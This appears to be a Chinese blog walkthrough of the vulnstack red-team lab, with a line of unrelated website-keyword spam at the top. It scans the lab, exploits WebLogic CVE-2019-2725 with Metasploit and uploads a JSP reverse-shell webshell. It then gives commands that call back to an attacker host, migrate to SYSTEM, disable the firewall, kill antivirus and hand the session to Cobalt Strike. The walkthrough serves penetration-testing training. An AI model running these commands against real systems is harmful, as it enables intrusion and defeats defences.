一个人可以做几个网站负责人,佛山市做网站,长沙建站工作室,wordpress公司网页主题靶场下载来自#xff1a; http://vulnstack.qiyuanxuetang.net/vuln/detail/3/ 靶场统一登录密码#xff1a;1qazWSX 按大佬的说法是
环境需要模拟内网和外网两个网段#xff0c;PC端虚拟机相当于网关服务器#xff0c;所以需要两张网卡#xff0c;一个用来向外网提供web… 靶场下载来自 http://vulnstack.qiyuanxuetang.net/vuln/detail/3/ 靶场统一登录密码1qazWSX 按大佬的说法是
环境需要模拟内网和外网两个网段PC端虚拟机相当于网关服务器所以需要两张网卡一个用来向外网提供web服务一个是通向内网 这是pc的配置 这是DC的配置
web的配置和pc的配置一样就行就是两台网络适配器
将新增的网卡VMnet2子网ip调成10段。 这是官网的环境说明 可以看到dmz网段也就是外网网段是写成了192.168.111.1/24
我们最后还要用ipconfig查看各主机的ip
WEB主机 PC主机 DC主机 以及我们的kali WEB主机进入C:\Oracle\Middleware\user_projects\domains\base_domain\bin
以管理员身份运行strartWebLogic.cmd后环境就搭建好了
首先用nmap扫描一下目标IP
nmap -sS -sV -Pn -T4 192.168.111.80 -sS 使用TCP的SYN进行扫描很少在目标主机上留下扫描日志 -sV 探测服务/版本信息 -Pn 将所有主机视为在在线跳过主机发现可以穿过防火墙 -T4 代表扫描时间间隔 nmap的使用见
nmap详细使用教程_nmap使用教程-CSDN博客 我们可以百度一下开放这些端口可能会存在些什么代表性的漏洞 445端口开放意味着存在smb服务可能存在ms17_010永恒之蓝漏洞。 7001端口说明目标IP存在weblogic服务可能存在反序列化SSRF,任意文件上传后台路径泄露 开放139端口就存在Samba服务就可能存在爆破/未授权访问/远程命令执行漏洞 放1433端口就存在mssql服务可能存在爆破/注入/SA弱口令。 开放3389端口就存在远程桌面。 常见的端口及可能存在的漏洞参考文章
https://www.cnblogs.com/zcg-cpdd/p/14630766.html
在此之前我们还需要下weblogicscan
weblogicscan工具地址
1.https://gitee.com/opticfiber/WeblogicScan/repository/archive/master.zip
2.https://github.com/dr0op/WeblogicScan.git
执行命令
python WeblogicScan.py -u ip -p 7001 存在两个CVE漏洞CVE-2017-3506、CVE-2019-2725
存在后台路径还存在一个SSRF漏洞
SSRF漏洞存在于http://ip:7001/uddiexplorer/SearchPublicRegistries.jsp 知道了存在CVE-2019-2725的漏洞使用msf查看一下漏洞利用脚本
msfconsole
search CVE-2019-2725use exploit/multi/misc/weblogic_deserialize_asyncresponseservice 在此之前我们还需要下载一个java反序列化工具
下载链接见
Releases · shack2/javaserializetools · GitHub
下第一个就行 java -jar 文件 即可运行 执行 msf生成木马
msfvenom -p windows/meterpreter/reverse_tcp LHOST192.168.111.136 LPORT4444 -f jsp /root/test.jsp
把shell写到控制台images目录中
\Oracle\Middleware\wlserver_10.3\server\lib\consoleapp\webapp\framework\skins\wlsconsole\images\shell.jsp 目录上传木马 msf开启监听访问shell.jsp,获得回话administrator权限 use exploit/multi/handler set payload windows/meterpreter/reverse_tcp msf操作教程见
【工具使用】——Metasploit(MSF)使用详解(超详细)-CSDN博客
我们用shell systeminfo命令 用chcp 65001解决出现的乱码 我们用ps命令查看进程 getpid查看进程号得到 进程迁移到system权限进程services
百度了一下更多见Services.exe是什么如何辨别services.exe是否为病毒-太平洋IT百科 migrate 512进程迁移后是system权限 netsh advfirewall set allprofiles state off 关闭防火墙
run killav 关闭杀软
内网
打开cs创建一个监听器
这里需要注意的就是cs需要java11 我们在cmd界面用java -version可以查看此时的java版本 创建监听器 执行命令
background use exploit/windows/local/payload_inject set payload windows/meterpreter/reverse_http set DisablePayloadHandler true set lhost 192.168.235.129 set lport 8888 set session 2 run 在cs中进行提权